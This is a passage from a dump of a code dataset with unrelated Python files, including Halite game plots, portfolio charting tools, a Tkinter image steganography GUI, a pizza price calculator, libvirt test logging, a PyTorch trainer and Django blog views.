'shipyards': p0_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf1 = pd.DataFrame(\n\ndata={'player':'p1','step': steps, 'board_halite': board_halite,\n\n 'halite': p1_halite,\n\n 'cargo': p1_cargo,\n\n 'ships': p1_ships,\n\n 'shipyards': p1_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf2 = pd.DataFrame(\n\ndata={'player':'p2','step': steps, 'board_halite': board_halite,\n\n 'halite': p2_halite,\n\n 'cargo': p2_cargo,\n\n 'ships': p2_ships,\n\n 'shipyards': p2_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\ndf3 = pd.DataFrame(\n\ndata={'player':'p3','step': steps, 'board_halite': board_halite,\n\n 'halite': p3_halite,\n\n 'cargo': p3_cargo,\n\n 'ships': p3_ships,\n\n 'shipyards': p3_shipyards,\n\n},\n\ncolumns=['player','step', 'board_halite',\n\n 'halite',\n\n 'cargo',\n\n 'ships',\n\n 'shipyards',\n\n ]\n\n)\n\n\n\ndf_merged = pd.concat([df0,df1,df2,df3])\n\ndf_merged['total_halite'] = df_merged['halite'] + df_merged['cargo']\n\ndf_merged['cargo_average'] = df_merged['cargo'] / df_merged['ships']\n\ndf_merged['cargo_percentage'] = df_merged['cargo'] / df_merged['total_halite']\ndf_merged\nplt.figure(figsize=(12,8))\n\nplt.title(\"player halite at game end\", fontsize=15)\n\nsns.barplot(data=df_merged[df_merged['step']==last_step],x='player',y='halite',ci=None)\n\nplt.ylabel('halite', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"average halite in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='halite',ci=None)\n\nplt.ylabel('mean halite', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo at game end\", fontsize=15)\n\nsns.barplot(data=df_merged[df_merged['step']==last_step],x='player',y='cargo',ci=None)\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='halite' ,hue='player')\n\nplt.ylabel('halite', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player and board halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='halite' ,hue='player')\n\nsns.lineplot(data=df,x='step',y='board_halite' ,color='black')\n\nplt.ylabel('halite', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo', hue='player')\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"player cargo and board halite time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo', hue='player')\n\nsns.lineplot(data=df,x='step',y='board_halite' ,color='black')\n\nplt.ylabel('cargo', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"total halite (halite + cargo) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='total_halite', hue='player')\n\nplt.ylabel('halite (halite + cargo)', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"cargo percentage (cargo / (halite + cargo)) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo_percentage', hue='player')\n\nplt.ylabel('cargo percentage (cargo / (halite + cargo))', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"total shipyard count time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='shipyards', hue='player')\n\nplt.ylabel('shipyard count', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"average shipyard count in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='shipyards',ci=None)\n\nplt.ylabel('mean shipyard count', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"total ship count time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='ships', hue='player')\n\nplt.ylabel('ship count', fontsize=12)\n\nplt.show()\n\nplt.figure(figsize=(12,8))\n\nplt.title(\"average ship count in game\", fontsize=15)\n\nsns.barplot(data=df_merged,x='player',y='ships',ci=None)\n\nplt.ylabel('mean ship count', fontsize=12)\n\nplt.xlabel('player', fontsize=12)\n\nplt.show()\nplt.figure(figsize=(12,8))\n\nplt.title(\"cargo average(cargo / ship count) time line\", fontsize=15)\n\nsns.lineplot(data=df_merged,x='step',y='cargo_average', hue='player')\n\nplt.ylabel('cargo average', fontsize=12)\n\nplt.show()\n","repo_name":"aorursy/new-nb-3","sub_path":"iicyan_halite-result-visualization-from-leaderboard.py","file_name":"iicyan_halite-result-visualization-from-leaderboard.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3434043588","text":"\n##################################################################################################################\n\"\"\"\n\n\"\"\"\n\n# Built-in/Generic Imports\nfrom datetime import datetime\n\n# Libs\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport six\n\n# Own modules\n\n\n__version__ = '1.1.1'\n__author__ = 'Victor Guillet'\n__date__ = '10/09/2019'\n\n#################################################################################################################\n\n\nclass Plot_tools:\n def __init__(self):\n pd.options.plotting.backend = \"plotly\"\n\n @staticmethod\n def plot_portfolio_overview(data, pair, counter_value, width=800, height=380, show_plot=False):\n fig = data.plot(x=\"date\", y=[\"portfolio_invested_\" + pair, \"portfolio_value_\" + pair])\n\n fig.update_layout(title=\"Portfolio performance - \" + pair.title(), title_x=0.5,\n yaxis_title=counter_value,\n autosize=False,\n width=width,\n height=height)\n\n if show_plot:\n fig.show()\n\n fig.write_image(\"Data/~temp/Portfolio_performance_\" + pair + \"_linechart.png\")\n\n return\n\n @staticmethod\n def plot_candlestick_chart(data, currency, counter_value, width=800, height=380, show_plot=False):\n # --> Create figure\n fig = go.Figure(data=[go.Candlestick(x=data['time_close'],\n open=data['price_open'], close=data['price_close'],\n high=data['price_high'], low=data['price_low'], )])\n\n fig.update_layout(\n title=currency + \"-\" + counter_value, title_x=0.5,\n yaxis_title=counter_value,\n autosize=False,\n width=width,\n height=height)\n\n if show_plot:\n fig.show()\n\n # --> Remove range slider before converting to image\n fig.update_layout(xaxis_rangeslider_visible=False)\n\n fig.write_image(\"Data/~temp/\" + currency + \"-\" + counter_value + \"_candlechart.png\")\n\n return\n\n @staticmethod\n def plot_pie_chart(data, values=\"cost\", show_plot=False):\n fig = px.pie(data, values=values, names=\"pair\")\n fig.update_traces(textposition='inside', textinfo='percent+label')\n\n fig.update_layout(title=values.title() + \" allocation\", title_x=0.5,\n showlegend=False)\n\n if show_plot:\n fig.show()\n\n fig.write_image(\"Data/~temp/\" + values + \"_piechart.png\")\n\n return\n\n @staticmethod\n def plot_dataframe(data, name, col_width=2.0, row_height=0.625, font_size=14,\n header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',\n bbox=[0, 0, 1, 1], header_columns=0,\n ax=None, show_plot=False):\n if ax is None:\n size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])\n fig, ax = plt.subplots(figsize=size)\n ax.axis('off')\n\n mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns)\n\n mpl_table.auto_set_font_size(False)\n mpl_table.set_fontsize(font_size)\n\n for k, cell in six.iteritems(mpl_table._cells):\n cell.set_edgecolor(edge_color)\n if k[0] == 0 or k[1] < header_columns:\n cell.set_text_props(weight='bold', color='w')\n cell.set_facecolor(header_color)\n else:\n cell.set_facecolor(row_colors[k[0] % len(row_colors)])\n\n if show_plot:\n plt.show()\n\n ax.get_figure().savefig(\"Data/~temp/\" + name + \"_table.png\")\n\n return\n","repo_name":"vguillet/Portfolio_manager","sub_path":"src/Tools/Plot_tools.py","file_name":"Plot_tools.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23269022304","text":"from modules import *\nimport steganography\n\n\nclass Stego:\n\n def OpenEncodeDialog(self):\n self.encode_dialog = tkinter.Toplevel(self.root)\n self.encode_dialog.resizable(True, False)\n self.encode_dialog.title('Image Steganographer - Encode')\n self.encode_dialog.configure(bg='#393E46')\n self.encode_dialog.geometry('400x400')\n self.encode_dialog.minsize(400, 400)\n\n self.img_path_label = tkinter.Label(self.encode_dialog, text='Image Path', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.15, anchor=tkinter.CENTER)\n\n self.img_path_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.img_path_entry.place(\n relx=0.5, rely=0.21, anchor=tkinter.CENTER)\n\n self.message_label = tkinter.Label(self.encode_dialog, text='Secret Message', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.30, anchor=tkinter.CENTER)\n\n self.message_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.message_entry.place(\n relx=0.5, rely=0.36, anchor=tkinter.CENTER)\n\n self.out_path_label = tkinter.Label(self.encode_dialog, text='Encoded File Name (Path)', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.46, anchor=tkinter.CENTER)\n\n self.out_path_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.out_path_entry.place(\n relx=0.5, rely=0.52, anchor=tkinter.CENTER)\n\n self.encode_button = tkinter.Button(self.encode_dialog, text='ENCODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=lambda: steganography.Encode(self.img_path_entry.get(), self.message_entry.get(), self.out_path_entry.get(),self)).place(\n relx=0.5, rely=0.63, anchor=tkinter.CENTER)\n\n self.abort_button = tkinter.Button(self.encode_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.encode_dialog.destroy).place(\n relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n def OpenDecodeDialog(self):\n\n self.decode_dialog = tkinter.Toplevel(self.root)\n self.decode_dialog.resizable(True, False)\n self.decode_dialog.title('Image Steganographer - Decode')\n self.decode_dialog.configure(bg='#393E46')\n self.decode_dialog.geometry('400x400')\n self.decode_dialog.minsize(400, 400)\n\n self.img_path_label = tkinter.Label(self.decode_dialog, text='Encoded Image Path', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.17, anchor=tkinter.CENTER)\n\n self.img_path_entry = tkinter.Entry(\n self.decode_dialog, width=30, bg='#F7F7F7')\n self.img_path_entry.place(\n relx=0.5, rely=0.23, anchor=tkinter.CENTER)\n\n self.message_label = tkinter.Label(self.decode_dialog, text='Decoded Message', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.56, anchor=tkinter.CENTER)\n\n self.text_ = tkinter.Text(self.decode_dialog, height=5, width=30)\n\n self.text_.place(relx=0.5, rely=0.70, anchor=tkinter.CENTER)\n\n self.text_.config(state='normal')\n\n self.decode_button = tkinter.Button(self.decode_dialog, text='DECODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=lambda: steganography.Decode(self.img_path_entry.get(), self)).place(\n relx=0.5, rely=0.32, anchor=tkinter.CENTER)\n\n self.text_.delete(1.0, \"end\")\n self.text_.insert(\"end\", self.decoded_message)\n\n self.abort_button = tkinter.Button(self.decode_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.decode_dialog.destroy).place(\n relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n def OpenSuccessDialog(self):\n self.success_dialog = tkinter.Toplevel(self.encode_dialog)\n self.success_dialog.resizable(True, False)\n self.success_dialog.title('Image Steganographer - Success')\n self.success_dialog.configure(bg='#44AC33')\n self.success_dialog.geometry('500x100')\n self.success_dialog.minsize(500, 100)\n self.success_label = tkinter.Label(self.success_dialog, text='SUCCESS: Image Encoded Successfully!', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', bg='#44AC33').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.ok_button = tkinter.Button(self.success_dialog, text='Ok', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.success_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def NoHiddenMessageDialog(self):\n self.nhm_dialog = tkinter.Toplevel(self.decode_dialog)\n self.nhm_dialog.resizable(True, False)\n self.nhm_dialog.title('Image Steganographer - ERROR#1')\n self.nhm_dialog.configure(bg='#D0342C')\n self.nhm_dialog.geometry('600x100')\n self.nhm_dialog.minsize(600, 100)\n self.nhm_label = tkinter.Label(self.nhm_dialog, text='ERROR: No Hidden Message Found', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', bg='#D0342C').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.abort_button = tkinter.Button(self.nhm_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.nhm_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def GreaterSizeRequired(self):\n self.gs_dialog = tkinter.Toplevel(self.encode_dialog)\n self.gs_dialog.resizable(True, False)\n self.gs_dialog.title('Image Steganographer - ERROR#1')\n self.gs_dialog.configure(bg='#D0342C')\n self.gs_dialog.geometry('500x100')\n self.gs_dialog.minsize(500, 100)\n self.succes_label = tkinter.Label(self.gs_dialog, text='ERROR: Greater size image required', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', bg='#D0342C').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.abort_button = tkinter.Button(self.gs_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.gs_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def __init__(self):\n self.decoded_message = ''\n\n self.root = tkinter.Tk()\n\n self.root.resizable(True, False)\n self.root.title('Image Steganographer')\n self.root.configure(bg='#393E46')\n self.root.geometry('500x500')\n self.root.minsize(500, 500)\n\n self.heading_label_1 = tkinter.Label(self.root, text='WELCOME TO', font=(\n 'Inter', 15), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n\n self.heading_label_2 = tkinter.Label(self.root, text='IMAGE STEGANOGRAPHER', font=(\n 'Inter', 20, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n\n self.encode_button = tkinter.Button(self.root, text='ENCODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=self.OpenEncodeDialog).place(\n relx=0.5, rely=0.5, anchor=tkinter.CENTER)\n\n self.decode_button = tkinter.Button(self.root, text='DECODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=self.OpenDecodeDialog).place(\n relx=0.5, rely=0.58, anchor=tkinter.CENTER)\n\n self.quit_button = tkinter.Button(self.root, text='Quit', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.root.destroy).place(\n relx=0.5, rely=0.8, anchor=tkinter.CENTER)\n\n self.prj_info = tkinter.Label(self.root, text='Minor Project - 2022 - Image Steganography - 141', font=(\n 'Inter', 8), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n self.root.mainloop()\n\n\nstg = Stego()\n","repo_name":"mehta-manan/Image_Steganography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11220192190","text":"# Kyle Wenzel\n# October 9th, 2020\n# Pizza Program\n# This program will ask for the amount of pizzas, size and other conditions and calculate the final cost\n\nprint(\"\\nWelcome to the Pizza program. \")\n\nprint(\"Please select an option. \\n\")\nprint(''' 6 inch ($4).......Press 1\n10 inch ($7.50)....Press 2\n14 inch (12.90)....Press 3\n16 inch ($14.25)...Press 4''')\nselection1 = int(input(\"\\nEnter your selection: \"))\n\nif selection1 != 1 and selection1 != 2 and selection1 != 3 and selection1 != 4:\n print(\"\\nNot a valid selection.\")\n exit()\n\nif selection1 == 1:\n size = 6\n sizecost = 4\n cpt = \"$0.50\"\n cptm = 0.5\nelif selection1 == 2:\n size = 10\n sizecost = 7.5\n cpt = \"$0.60\"\n cptm = 0.6\nelif selection1 == 3:\n size = 14\n sizecost = 12.9\n cpt = \"$0.75\"\n cptm = 0.75\nelif selection1 == 4:\n size = 16\n sizecost = 14.25\n cpt = \"$0.90\"\n cptm = 0.9\n\nprint(\"\\nThe cost per topping for a\", size, \"inch pizza is\", cpt)\nselection2 = int(input(\"Enter the amount of toppings you would like: \"))\n\nif selection1 == 1 or selection1 == 2:\n extracheese = 1\nelif selection1 == 3 or selection1 == 4:\n extracheese = 2\n\nprint(\"\\nThe cost for extra cheese for a\", size, \"inch pizza is \" + \"${:.2f}\".format(extracheese))\nselection3 = input(\"Would you like extra cheese? (y)es or (n)o: \")\nselection3 = selection3.lower()\n\nif selection3 == \"y\" or selection3 == \"yes\":\n cheeseselection = 1\nelif selection3 == \"n\" or selection3 == \"no\":\n cheeseselection = 2\nelse:\n print(\"\\nYou broke something. \")\n exit()\n\nif cheeseselection == 2:\n extracheese = 0\n endcap = \"is: \"\nelif cheeseselection == 1 and extracheese == 1:\n extracheese = 1\n endcap = \"and extra cheese is: \"\nelif cheeseselection == 1 and extracheese == 2:\n extracheese = 2\n endcap = \"and extra cheese is: \"\nelse:\n print(\"\\nHow did you get here? \")\n exit()\n\npizzasub = sizecost + (cptm * selection2) + extracheese \npizzatax = pizzasub * 0.06\npizzafinal = pizzasub + pizzatax\n\nprint(\"\\nThe final cost for your\", size, \"inch pizza with\", endcap + \"${:.2f}\".format(pizzafinal))\nprint(\"Thank You!\")","repo_name":"The4thGoose/Programming","sub_path":"Chapter 3/Chapter 3 Programs/WenzelPizzaProgram.py","file_name":"WenzelPizzaProgram.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3855701084","text":"# Filename: virtlab.py\n# Summary: Writing test logs and case generator for virtlab.\n# Description: This module is for test logs and case generation use.\n# Maintainer: nzhang@redhat.com, xhu@redhat.com\n# Updated: Thu Apr 1, 2010\n# Version: 0.1.0\n\nimport os\nimport re\n\nfrom . import utils\nfrom . import process\n\nguest = {}\nguest['rhel3u9'] = 'RHEL-3.9'\nguest['rhel4u8'] = 'RHEL-4.8'\nguest['rhel5u4'] = 'RHEL-Server-5.4'\nguest['rhel5u5'] = 'RHEL-Server-5.5'\nguest['rhel6'] = 'RHEL-6.0'\nguest['fedora12'] = 'Fedora-12'\nguest['winxp'] = 'WinXP'\nguest['win2003'] = 'Win2003'\nguest['win2008'] = 'Win2008'\nguest['win2008r2'] = 'Win2008R2'\nguest['win7'] = 'Win7'\n\nmemory = {}\nmemory['1048576'] = '1G'\nmemory['2097152'] = '2G'\nmemory['4194304'] = '4G'\nmemory['8388608'] = '8G'\nmemory['1G'] = '1048576'\nmemory['2G'] = '2097152'\nmemory['4G'] = '4194304'\nmemory['8G'] = '8388608'\n\ntest_run_params = {}\n\n\ndef result_log(mod_case_func, case_params, ret, case_start_time, case_end_time):\n # get test run parameters\n global test_run_params\n libvirt_ver = utils.get_libvirt_version()\n hypervisor_ver = utils.get_hypervisor_version()\n kernel_ver = utils.get_host_kernel_version()\n\n testcase = mod_case_func\n if ret == 0:\n status = 'GOOD'\n else:\n status = 'FAIL'\n\n line = '-' * 120 + \"\\nSTART\\t[%s][][libvirt_version=%s][hypervisor_version=%s][kernel_version=%s]\" % (testcase, libvirt_ver, hypervisor_ver, kernel_ver)\n for key in list(case_params.keys()):\n if key != \"xml\":\n line += \"[%s=%s]\" % (key, case_params[key])\n line += \"\\t%s\\n%s\\nEND\\t%s\" % (case_start_time, status, case_end_time)\n logfile = 'result/result.log'\n if os.path.isfile(logfile):\n try:\n fp = open(logfile, 'a+')\n line = '\\n' + line\n fp.writelines(line)\n fp.close()\n except OSError as err:\n print(\"ERROR: error writing to file '\" + logfile + \"'!\")\n return False\n else:\n try:\n if os.path.exists('result'):\n pass\n else:\n os.makedirs('result')\n fp = open(logfile, 'w+')\n line = '\\n' + line\n fp.writelines(line)\n fp.close()\n except OSError as err:\n print(\"ERROR: error writing to file '\" + logfile + \"'!\")\n return False\n return True\n\n\ndef case_spawn(filename, str1, str2):\n fp_read = open(filename, 'r')\n filer = fp_read.read()\n sub = re.sub(str1, str2, filer)\n fp_read.close()\n fp_write = open(filename, 'w')\n fp_write.write(sub)\n fp_write.close()\n\n\ndef isvirtlab():\n cmd = \"ps aux | grep STAFProc |grep -v grep\"\n result = process.run(cmd, shell=True, ignore_status=True)\n if result.exit_status == 0:\n return True\n else:\n return False\n\n\ndef create_virtlab_log(testrunid):\n create_virtlab_cmd = 'cp -Rf log/%s result' % testrunid\n os.system(create_virtlab_cmd)\n","repo_name":"libvirt/libvirt-test-API","sub_path":"libvirttestapi/utils/virtlab.py","file_name":"virtlab.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"24878209720","text":"# Voros Vivien\r\n# J4VDGE\r\n# h986160\r\n\r\ndef dict_kiegeszit(parameter):\r\n lista = []\r\n if len(parameter) == 0:\r\n return parameter\r\n for i in parameter:\r\n lista.append(i)\r\n for i in range(1, max(lista)):\r\n if i not in lista:\r\n parameter[i] = 0\r\n\r\n return parameter\r\n\r\n\r\nclass Film:\r\n def __init__(self, _cim, hossz=60):\r\n self._cim = _cim\r\n self.hossz = hossz\r\n self.ertekelesek = []\r\n\r\n @property\r\n def cim(self):\r\n return self._cim\r\n\r\n @cim.setter\r\n def cim(self, ertek):\r\n if isinstance(ertek, str):\r\n self._cim = ertek\r\n\r\n def ertekelest_felvesz(self, ertekeles):\r\n if not isinstance(ertekeles, float):\r\n raise Exception(\"Hibas ertekeles\")\r\n else:\r\n if (ertekeles >= 1.0 and ertekeles <= 10.0):\r\n self.ertekelesek.append(ertekeles)\r\n else:\r\n raise Exception(\"Hibas ertekeles\")\r\n\r\n def __lt__(self, other):\r\n if not isinstance(other, Film):\r\n return False\r\n if self.hossz < other.hossz:\r\n return True\r\n else:\r\n return False\r\n\r\n def __str__(self):\r\n return self._cim + \", \" + str(self.hossz) + \" perc hosszu film, \" + str(\r\n len(self.ertekelesek)) + \" darab ertekelessel.\"\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Film):\r\n return False\r\n return self.__dict__ == other.__dict__\r\n\r\ndef factorial(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * factorial(n-1)\r\n# res = { 4: 8, 6: 1, 3: 10 }\r\n# print(dict_kiegeszit(res))\r\n\r\nszoveg = \"Micimackó szereti a mézet.\"\r\nprint(szoveg[:])\r\n\r\n# 3x3 matrix\r\nX = [[12,7,3],\r\n [4 ,5,6],\r\n [7 ,8,9]]\r\n\r\n# 3x4 matrix\r\nY = [[5,8,1,2],\r\n [6,7,3,0],\r\n [4,5,9,1]]\r\n\r\n# result is 3x4\r\nresult = [[0,0,0,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n\r\nfor i in range(len(X)):\r\n\r\n for j in range(len(Y[0])):\r\n for k in range(len(Y)):\r\n result[i][j] += X[i][k] * Y[k][j]\r\n\r\nfor r in result:\r\n print(r)\r\n\r\n\r\n","repo_name":"wivien19/python","sub_path":"film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35360833234","text":"import torch\n\n\nclass Train():\n def __init__(self, model, config):\n self._model = model\n self._config = config\n self._optimizer = torch.optim.SGD(self._model.parameters(), lr=config['lr'],\n weight_decay=config['l2_regularization'])\n self._loss_func = torch.nn.MSELoss()\n\n def _train_single_batch(self, x, labels):\n \"\"\"\n 对单个小批量数据进行训练\n \"\"\"\n self._optimizer.zero_grad()\n y_predict = self._model(x)\n print(y_predict)\n loss = self._loss_func(y_predict.view(-1, 1), labels)\n\n loss.backward()\n self._optimizer.step()\n\n loss = loss.item() # The item() method extracts the loss’s value as a Python float.\n return loss, y_predict\n\n def _train_an_epoch(self, train_loader, epoch_id):\n \"\"\"\n 训练一个Epoch,即将训练集中的所有样本全部都过一遍\n \"\"\"\n self._model.train()\n total = 0\n X = train_loader[:,:-1]\n Labels = train_loader[:,-1]\n length = len(X)\n print(X.shape, Labels.shape)\n for index in range((len(X) // self._config[\"bitch_size\"]) + 1):\n end = min(self._config[\"bitch_size\"], length - self._config[\"bitch_size\"] * index)\n x, labels = X[self._config[\"bitch_size\"] * index : self._config[\"bitch_size\"] * index + end], Labels[self._config[\"bitch_size\"] * index : self._config[\"bitch_size\"] * index + end]\n x = torch.FloatTensor(x)\n labels = torch.FloatTensor(labels)\n if self._config[\"use_cuda\"] is True:\n x, labels = x.cuda(), labels.cuda()\n loss, y_predict = self._train_single_batch(x, labels)\n total += loss\n print(\"Training Epoch: %d, total loss: %f\" % (epoch_id, total))\n\n def train(self, train_dataset):\n self.use_cuda()\n for epoch in range(self._config[\"epoch\"]):\n print('-' * 20 + ' Epoch {} starts '.format(epoch) + '-' * 20)\n self._train_an_epoch(train_dataset, epoch_id=epoch + 1)\n\n def evaluate(self, test_dataset):\n x = test_dataset[:, :-1]\n labels = test_dataset[:, -1]\n\n x, labels = torch.FloatTensor(x), torch.FloatTensor(labels)\n if self._config[\"use_cuda\"] is True:\n x = x.cuda()\n y_predict = self._model(x)\n\n def use_cuda(self):\n if self._config['use_cuda'] is True:\n assert torch.cuda.is_available(), 'CUDA is not available'\n torch.cuda.set_device(self._config['device_id'])\n self._model.cuda()\n\n def save(self):\n pass\n","repo_name":"shishanya/fm","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17208694229","text":"from django.shortcuts import render\n\nfrom blog_own.models import Homework, Appointment, Meeting\nfrom blog_own.forms import Homework_form, Appointment_form, Meeting_form\n\n# Create your views here.\n\ndef inicio_blog(request):\n return render(request, 'blog_own/start.html')\n\ndef homework_add(request):\n if request.method == 'POST':\n form = Homework_form(request.POST) # Llega toda la informacion del Html.\n print(form)\n if form.is_valid: # Lo valida Django\n information = form.cleaned_data\n homework = Homework( title=information['title'], subject=information['subject'], final_date=information['final_date'])\n homework.save()\n return render(request, \"blog_own/start.html\")\n\n else:\n form = Homework_form() # Formulario vacio para construir el html.\n \n return render(request, \"blog_own/homework.html\", {\"form\": form})\n\ndef appointment_add(request):\n if request.method == 'POST':\n form = Appointment_form(request.POST) # Llega toda la informacion del Html.\n print(form)\n if form.is_valid: # Lo valida Django\n information = form.cleaned_data\n appointment = Appointment(title=information['title'], place=information['place'], date=information['date'])\n appointment.save()\n return render(request, \"blog_own/start.html\")\n\n else:\n form = Appointment_form() # Formulario vacio para construir el html.\n \n return render(request, \"blog_own/appointment.html\", {\"form\": form})\n\ndef meeting_add(request):\n if request.method == 'POST':\n form = Meeting_form(request.POST) # Llega toda la informacion del Html.\n print(form)\n if form.is_valid: # Lo valida Django\n information = form.cleaned_data\n meeting = Meeting(title=information['title'], date=information['date'], link=information['link'], platform=information['platform'])\n meeting.save()\n return render(request, \"blog_own/start.html\")\n\n else:\n form = Meeting_form() # Formulario vacio para construir el html.\n \n return render(request, \"blog_own/meeting.html\", {\"form\": form})\n\ndef search_homework(request):\n return render(request, \"blog_own/search_homework.html\")\n\ndef search_appointment(request):\n return render(request, \"blog_own/search_appointment.html\")\n\ndef search_meeting(request):\n return render(request, \"blog_own/search_meeting.html\")\n\ndef search_date_homework(request):\n if request.GET[\"date\"]:\n date = request.GET[\"date\"]\n objects = Homework.objects.filter(final_date__icontains=date) # Ojo con el platform OOOOOO.OOOOOOOO\n\n return render(request, \"blog_own/search_results_homework.html\", {\"objects\": objects, \"date\":date})\n \n else:\n answer = \"No se enviaron datos\"\n \n return HttpResponse(answer)\n\ndef search_date_appointment(request):\n if request.GET[\"date\"]:\n date = request.GET[\"date\"]\n objects = Appointment.objects.filter(date__icontains=date)\n\n return render(request, \"blog_own/search_results_appointment.html\", {\"objects\": objects, \"date\":date})\n \n else:\n answer = \"No se enviaron datos\"\n \n return HttpResponse(answer)\n\ndef search_date_meeting(request):\n if request.GET[\"date\"]:\n date = request.GET[\"date\"]\n objects = Meeting.objects.filter(date__icontains=date)\n\n return render(request, \"blog_own/search_results_meeting.html\", {\"objects\": objects, \"date\":date})\n \n else:\n answer = \"No se enviaron datos\"\n \n return 